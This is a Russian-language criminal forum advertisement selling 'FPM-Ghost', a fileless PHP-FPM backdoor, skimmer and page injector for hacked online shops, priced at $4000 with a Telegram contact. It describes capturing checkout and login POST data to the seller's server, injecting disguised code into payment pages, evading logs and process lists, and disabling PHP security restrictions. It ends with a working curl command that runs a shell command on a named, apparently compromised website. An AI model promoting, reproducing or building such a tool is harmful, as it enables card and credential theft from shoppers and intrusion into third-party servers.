Нет прав поставить снифер? Сносят шеллы? FPM-Ghost - бесфайловый бекдор/фреймер/снифер

[Lavander]

Цена

4000$

Контакты

https://t.me/IamLavander

День добрый.
У тех из нас, кто работает с шопами ни раз случались ситуации, когда на шопе php-код выполнить разок можно, но ни через базу не поставить снифф, ни прав на нужные файлы не хватает.
И именно для этих случаев теперь есть решение.
Бекдор в виде php-кода, который нужно только раз выполнить на сервере, и он останется жить в памяти.
Сразу минусы:

• он не переживает перезапуск php-fpm.
• требует, чтобы на сервере крутился этот самый php-fpm.

А дальше только плюсы:

• умеет собственно, сам бекдор - выполнение команд на сервере по post-запросу (или из куки команду берет, лишь бы не светилось в логах).
• из прав требует только возможность выполнить php-код 1 раз и доступную функцию stream_socket_client .
• не виден в списке запущенных процессов.
• не трогает и не модифицирует никакие файлы.
• умеет (и делает) логирование post-запросов с подходящих по маске url на ваш сервер (маска по-умолчанию - все что имеет отношение к чекауту и логину)
• умеет вставлять ваш html-код перед закрывающим </head>, аккуратно, с сохранением отступов, чтобы никто не думал "этот гугл-тег тут лишний". И показывать его только на страницах, подходящих по маске (по-дефалту - страницы логина и чекаута).
• если в Cpanel используется глобальная настройка (без per-user), то при запуске будет активен сразу на всех доменах сервера.
• убирает open_basedir и обнуляет disable_functions (копаться на сервере сразу приятнее).
• имеет меня в виде тех-поддержки, что тоже не мало.

Цена: 4k$.
Контакты: https://t.me/IamLavander и лс форума.

Пример работы:
картинка не атачится, увы, так что играйтесь: curl -d 'fpm_ghost=ls -la' -X POST http://www.nctas.com